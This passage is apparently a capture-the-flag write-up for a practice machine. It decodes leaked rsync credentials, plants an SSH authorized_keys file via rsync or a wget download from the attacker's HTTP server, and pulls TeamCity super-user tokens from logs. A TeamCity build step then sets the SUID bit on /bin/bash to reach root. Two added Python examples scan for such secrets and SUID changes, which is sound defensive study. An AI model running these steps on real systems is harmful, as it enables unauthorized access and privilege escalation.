    └─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d 
    Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
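
    Both leaks above, a live requirepass in the NFS-exported redis.conf and base64-wrapped rsync credentials sitting in the authlist key, are exactly what a secret-scanning pass over exported files and cache contents should catch before anyone else does. The following is an added Python example, not part of the original write-up; it runs only on constructed inline samples (the conf fragment and the authlist value shown above) and never connects to a server.

```python
import base64
import binascii
import re

# Constructed sample: the redis.conf fragment shown above, comments included.
REDIS_CONF_SAMPLE = """\
# Redis configuration file example.
#
# masterauth
requirepass "B65Hx562F@ggAZ@F"
#
"""

# redis.conf directives whose value is a secret; commented-out lines are skipped.
SECRET_DIRECTIVES = ("requirepass", "masterauth")


def find_redis_secrets(conf_text):
    """Return [(directive, value)] for every live secret directive in a redis.conf."""
    found = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].lower() in SECRET_DIRECTIVES:
            found.append((parts[0].lower(), parts[1].strip().strip('"')))
    return found


# Words that make a decoded value worth flagging; they match the
# "Authorization for ... with password ..." wording hidden in authlist.
CREDENTIAL_WORDS = re.compile(r"\b(password|passwd|secret|token|apikey)\b", re.I)
# Shape of a base64 string long enough to hold a sentence rather than a short id.
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def decode_if_base64_text(value):
    """Return the decoded text when value is base64 of printable UTF-8, else None."""
    if not B64_SHAPE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8").strip()
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def find_encoded_credentials(store):
    """store maps each Redis key to its values (what KEYS *, GET and LRANGE show).
    Returns [(key, decoded_text)] for values that hide credential-like text."""
    hits = []
    for key, values in store.items():
        for value in values:
            text = decode_if_base64_text(value)
            if text and CREDENTIAL_WORDS.search(text):
                hits.append((key, text))
    return hits


def redact(text):
    """Mask the word after 'password' so a finding can be logged safely."""
    return re.sub(r"(password\s+)\S+", r"\1********", text, flags=re.I)


# Constructed dump: the authlist entry shown above plus harmless keys.
REDIS_DUMP_SAMPLE = {
    "marketlist": ["milk", "bread"],
    "tmp": [base64.b64encode(b"nothing sensitive in this scratch value").decode()],
    "authlist": ["QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="],
}


if __name__ == "__main__":
    for directive, value in find_redis_secrets(REDIS_CONF_SAMPLE):
        print(f"redis.conf: live {directive} set ({len(value)} chars)")
    for key, text in find_encoded_credentials(REDIS_DUMP_SAMPLE):
        print(f"redis key {key!r}: {redact(text)}")
```

    On a real host, feed find_redis_secrets the exported config files and find_encoded_credentials a dump built from KEYS *, GET and LRANGE, and log only the redacted text.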

    This leads us to rsync; again this is not at all surprising as we saw all these services running in our initial nmap scan.

    Enumerating rsync


    A quick refresher using --help shows us the switches we need to use.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -av --list-only rsync://10.10.155.145:873
    files           Necessary home interaction
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$

    Creating a folder and copying the files

    Browsing the directory, we can find user.txt. Other than that, there isn't anything useful here, except for the username. Now we can try to upload a public ssh key to the server and ssh into it.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ mkdir files                                                                                                                  10 ⨯
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -av rsync://rsync-connect@10.10.155.145:873/files ./rsync                                                              10 ⨯
    Password: 
    receiving incremental file list
    created directory ./rsync
    ./
    sys-internal/
    sys-internal/.bashrc
    sys-internal/.rediscli_history -> /dev/null
    sys-internal/.sudo_as_admin_successful
    sys-internal/.xsession-errors.old
    sys-internal/user.txt

    I can download files, like user.txt, but I also have the ability to upload files. I can upload an authorized_keys file to .ssh that I made so I can login through SSH. To start, I create the keys on my local system

    (without a passphrase)

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh-keygen -f ./id_rsa                                                             
    Generating public/private rsa key pair.
    Enter passphrase (empty for no passphrase): 
    Enter same passphrase again: 
    Your identification has been saved in ./id_rsa
    Your public key has been saved in ./id_rsa.pub
    The key fingerprint is:
    SHA256:I7t5fUgaY64/PuMwMpQKdzKt6/b0nnOMyjWauT33GfI hackerboy@KumarAtulJaiswal
    The key's randomart image is:
    +---[RSA 3072]----+
    |                 |
    |                 |
    |                 |
    |   . .           |
    |. + = . S        |
    | o B   o+..      |
    |  o + *=.*..     |
    |  .+ X+B@ooo.    |
    | oo.O+O@+=E.     |
    +----[SHA256]-----+
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 

    With this created, I change the name of id_rsa.pub to authorized_keys, then upload the file.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls                                                                                                                                    
    id_rsa  id_rsa.pub  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo cp id_rsa.pub authorized_keys                                                 
    [sudo] password for hackerboy: 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls
    authorized_keys id_rsa  id_rsa.pub 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$

    using the rsync password we decoded earlier, Hcg3HP67@TW@Bc72v:

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.155.145:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
    Password: 
    sending incremental file list
    id_rsa.pub
    
    sent 674 bytes  received 35 bytes  18.42 bytes/sec
    total size is 580  speedup is 0.82
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 

    Other Method for Uploading a File

    With python3 we can do the file transfer using this command:

    python3 -m http.server 1234

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ python3 -m http.server 1234                                                                                                            10 ⨯
    Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
    10.8.61.234 - - [10/May/2021 23:15:41] "GET / HTTP/1.1" 200 -
    10.8.61.234 - - [10/May/2021 23:15:41] code 404, message File not found
    10.8.61.234 - - [10/May/2021 23:15:41] "GET /favicon.ico HTTP/1.1" 404 -
    10.10.155.145 - - [10/May/2021 23:16:15] "GET /authorized_keys HTTP/1.1" 200 -
    ^C  
    Keyboard interrupt received, exiting.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 

    Then open a browser and enter 10.8.61.234:1234 in the address bar (using your own IP and the port you used in the command above).

    Copy the link to the file (authorized_keys)

    and download it on the vulnerable machine (sys-internal@vulnnet-internal) with the wget command. (Note: wget is already installed on the sys-internal machine, but curl is not.)

    sys-internal@vulnnet-internal:~/.ssh$ wget http://10.8.61.234:1234/authorized_keys
    --2021-05-10 14:16:10--  http://10.8.61.234:1234/authorized_keys
    Connecting to 10.8.61.234:1234... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 580 [application/octet-stream]
    Saving to: ‘authorized_keys.1’
    
    authorized_keys                 100%[===========================================================>]     580  --.-KB/s    in 0s      
    
    2021-05-10 14:16:11 (76.5 MB/s) - ‘authorized_keys.1’ saved [580/580]
    
    sys-internal@vulnnet-internal:~/.ssh$ ls
    authorized_keys  authorized_keys
    sys-internal@vulnnet-internal:~/.ssh$ 

    I can now log in as sys-internal through SSH from our machine.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh -i id_rsa sys-internal@10.10.155.145
    Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    
    541 packages can be updated.
    342 updates are security updates.
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    Last login: Mon May 10 13:57:55 2021 from 10.8.61.234
    sys-internal@vulnnet-internal:~$ whoami
    sys-internal
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ ls
    Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
    sys-internal@vulnnet-internal:~$ 

    Privilege Escalation

    Manually enumerating, I find a directory under / named TeamCity. Looking at this, I see it is running a web server, and I read its readme with cat TeamCity-readme.txt.

    sys-internal@vulnnet-internal:~$ cd /TeamCity
    sys-internal@vulnnet-internal:/TeamCity$ ls
    bin          buildAgent  devPackage  licenses  service.properties   temp                webapps
    BUILD_85899  conf        lib         logs      TeamCity-readme.txt  Tomcat-running.txt  work
    sys-internal@vulnnet-internal:/TeamCity$ cat  TeamCity-readme.txt
    This is the JetBrains TeamCity home directory.
    
    For evaluation purposes, we recommend running both server and agent. If you need to run only the TeamCity server, execute:
    * On Windows: `.\bin\teamcity-server.bat start`
    * On Linux and macOS: `./bin/teamcity-server.sh start`
    sys-internal@vulnnet-internal:/TeamCity$
    sys-internal@vulnnet-internal:/TeamCity$

    sys-internal@vulnnet-internal:/TeamCity$
    sys-internal@vulnnet-internal:/TeamCity$ ss | grep 8111
    tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:58689                                 [::ffff:127.0.0.1]:8111                             
    tcp  CLOSE-WAIT 1       0                          [::ffff:127.0.0.1]:39595                                 [::ffff:127.0.0.1]:8111                             
    tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:8111                                  [::ffff:127.0.0.1]:58689                            
    sys-internal@vulnnet-internal:/TeamCity$ 

    I can set up SSH port forwarding so I can access port 8111 on my localhost.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh sys-internal@10.10.155.145 -i id_rsa -L 8111:localhost:8111
    Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    
    541 packages can be updated.
    342 updates are security updates.
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    Last login: Mon May 10 14:20:06 2021 from 10.8.61.234
    sys-internal@vulnnet-internal:~$ 

    Now when I go to localhost:8111 I can connect to TeamCity and it is running version 2.2.

    When I click on Login as Super User, I see I need an Authentication Token. Going back to my SSH session, I can grep for an authentication token.

    sys-internal@vulnnet-internal:/TeamCity$ grep -r "authentication token"
    grep: temp/jna-3506402: Permission denied
    grep: webapps/ROOT/plugins/TeamCity.SharedResources: Permission denied
    grep: webapps/ROOT/plugins/data-dir-browse: Permission denied
    grep: webapps/ROOT/plugins/coverage: Permission denied
    
    logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
    
    sys-internal@vulnnet-internal:/TeamCity$ 

    authentication token 8070510537629599387

    I found several authentication tokens under logs/catalina.out. Using these, I can login. Poking around, I find I can create a new build.

    First, creating a new build, I can run a build step and execute Python. My first thought was to throw in a Python reverse shell, but this did not work. So, don't worry, we have a second solution.

    Since TeamCity is running as root, whatever connection we can get it to spawn will have root permissions, so we immediately started to poke for console pages, a terminal, or anything that could be used to run system commands.

    After a while we figured out that you can create a project, then a build configuration, skipping the question about a "New VCS Root".

    After creating a build configuration, choose "Build Steps" in the left menu to add a build step.

    Choose the runner type "Python" and choose the command type "custom script".

    Then, in the custom script section, we write a simple script.

    I can set the SUID bit on a binary to elevate my privileges. Since bash is the easiest, I chose to do that.

    import os

    os.system("chmod +s /bin/bash")

    After saving this build and running it, I go back to SSH session.

    Here, I see the /bin/bash permissions have changed.

    sys-internal@vulnnet-internal:/TeamCity$ 
    sys-internal@vulnnet-internal:/TeamCity$ cd 
    sys-internal@vulnnet-internal:~$ ls /bin/bash
    /bin/bash
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ ls /bin/bash
    /bin/bash
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ 
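
    A bare ls, as above, does not show whether a set-id bit is present; the mode bits do. The following is an added Python example, not from the original write-up, of the check a host-integrity job would run to catch exactly this change: a shell or interpreter gaining set-uid, or any set-id file absent from a baseline. The baseline allowlist is an illustrative assumption, and the demo tree it builds is constructed in a temporary directory.

```python
import os
import stat
import tempfile

# Assumed baseline: set-id files expected on a clean install. An operator builds
# the real list from a known-good image of the same release; these are illustrative.
EXPECTED_SETID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/mount", "/bin/umount",
}
# Shells and interpreters: a set-uid bit on one of these hands every local user
# the owner's effective uid (bash keeps it only when started with -p, as above).
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ksh", "python", "python3", "perl"}

SEVERITY = {"shell": 0, "unexpected": 1, "baseline": 2}


def setid_mode(path):
    """Return the permission bits of a regular file that carries set-uid or
    set-gid, or None for other files, symlinks and unreadable paths."""
    try:
        st = os.lstat(path)            # lstat: never follow symlinks
    except OSError:
        return None
    if not stat.S_ISREG(st.st_mode):
        return None
    if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    return stat.S_IMODE(st.st_mode)    # keeps the set-id bits, e.g. 0o4755


def classify(path, baseline):
    """Label a set-id file: 'shell' (worst), 'unexpected' (not in the
    baseline) or 'baseline'."""
    if os.path.basename(path) in SHELL_NAMES:
        return "shell"
    return "baseline" if path in baseline else "unexpected"


def audit_setid(roots, baseline=EXPECTED_SETID):
    """Walk roots and return [(path, mode, label)] for every set-id file,
    worst label first; mode is the octal string behind ls -l, e.g. '4755'."""
    findings = []
    for root in roots:
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                mode = setid_mode(path)
                if mode is not None:
                    findings.append((path, format(mode, "04o"), classify(path, baseline)))
    findings.sort(key=lambda f: (SEVERITY[f[2]], f[0]))
    return findings


def build_demo_tree():
    """Constructed fixture: a temp dir holding a set-uid 'bash' (the u+s half
    of the chmod +s above), a set-uid 'backup' that is not in the baseline,
    and a plain file. Returns the directory path."""
    base = tempfile.mkdtemp(prefix="setid-demo-")
    for name, mode in (("bash", 0o4755), ("backup", 0o4755), ("notes.txt", 0o644)):
        path = os.path.join(base, name)
        with open(path, "w") as fh:
            fh.write("demo\n")
        os.chmod(path, mode)           # chmod after close, so the write cannot clear it
    return base


if __name__ == "__main__":
    # Stand-alone demo on the fixture; on a real host pass ["/bin", "/usr/bin", "/usr/sbin"].
    for path, mode, label in audit_setid([build_demo_tree()]):
        print(f"{label:<10} {mode} {path}")
```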

    I can now elevate my privileges to root.

    As root, I can read root.txt

    sys-internal@vulnnet-internal:~$ 
    sys-internal@vulnnet-internal:~$ cd /bin/bash
    -bash: cd: /bin/bash: Not a directory
    sys-internal@vulnnet-internal:~$ 
    sys-internal@vulnnet-internal:~$ /bin/bash -p
    bash-4.4# whoami
    root
    bash-4.4# #kumaratuljaiswal.in
    bash-4.4# 
    bash-4.4# cat /root/root.txt
    THM{e8996faea46df09dba5676dd271c60bd}
    bash-4.4# 

    Finally we won!! Thanks for supporting :-)

    Disclaimer

    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

    - Hacking Truth by Kumar Atul Jaiswal

    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)